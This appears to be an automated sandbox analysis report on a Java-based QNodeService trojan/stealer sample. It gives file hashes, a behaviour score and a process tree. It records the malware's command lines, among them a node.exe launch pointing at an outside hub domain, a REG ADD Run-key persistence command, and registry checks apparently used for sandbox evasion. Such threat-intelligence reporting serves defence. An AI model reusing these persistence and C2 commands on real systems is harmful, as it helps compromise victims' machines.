Analysis
-
max time kernel
145s -
max time network
142s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
15-10-2020 12:57
Static task
static1
Behavioral task
behavioral1
Sample
SHPVE00475.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
SHPVE00475.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
SHPVE00475.jar
-
Size
289KB
-
MD5
42f3ebb894eac0d038013669e46738e6
-
SHA1
0de3d8cf20e002a5437d7548cf8da88a6f870e45
-
SHA256
3f604dbfd849aef188625d235597897b71e51ec1e7dbda3db3f3fe5204b04cae
-
SHA512
3fd28e3c317221de3ad5d0b83f21da1821ad5d1fbee512c3f466eed817d68cda31bb200b54d60b52db305ecb36bbf72335ce6be846239aba607fb083cc500f34
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1164 node.exe 2056 node.exe 716 node.exe -
Loads dropped DLL 6 IoCs
pid Process 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\13f2660e-b8cd-493b-b319-a5b590928cc8 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.9-beta\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad5c-167.dat js behavioral2/files/0x000100000001ad5c-172.dat js behavioral2/files/0x000100000001ad5c-320.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 wtfismyip.com 27 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1164 node.exe 1164 node.exe 1164 node.exe 1164 node.exe 2056 node.exe 2056 node.exe 2056 node.exe 2056 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe 716 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 508 wrote to memory of 2688 508 java.exe 74 PID 508 wrote to memory of 2688 508 java.exe 74 PID 2688 wrote to memory of 1164 2688 javaw.exe 78 PID 2688 wrote to memory of 1164 2688 javaw.exe 78 PID 1164 wrote to memory of 2056 1164 node.exe 80 PID 1164 wrote to memory of 2056 1164 node.exe 80 PID 2056 wrote to memory of 716 2056 node.exe 81 PID 2056 wrote to memory of 716 2056 node.exe 81 PID 716 wrote to memory of 860 716 node.exe 83 PID 716 wrote to memory of 860 716 node.exe 83 PID 860 wrote to memory of 784 860 cmd.exe 84 PID 860 wrote to memory of 784 860 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\SHPVE00475.jar1⤵
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\61b1a3c0.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain holdlozx.riepsol.com --hub-domain localhost3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_p3kXKC\boot.js --hub-domain holdlozx.riepsol.com --hub-domain localhost4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_p3kXKC\boot.js --hub-domain holdlozx.riepsol.com --hub-domain localhost5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "13f2660e-b8cd-493b-b319-a5b590928cc8" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.9-beta\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "13f2660e-b8cd-493b-b319-a5b590928cc8" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.9-beta\boot.vbs\""7⤵
- Adds Run key to start application
PID:784
-
-
-
-
-
-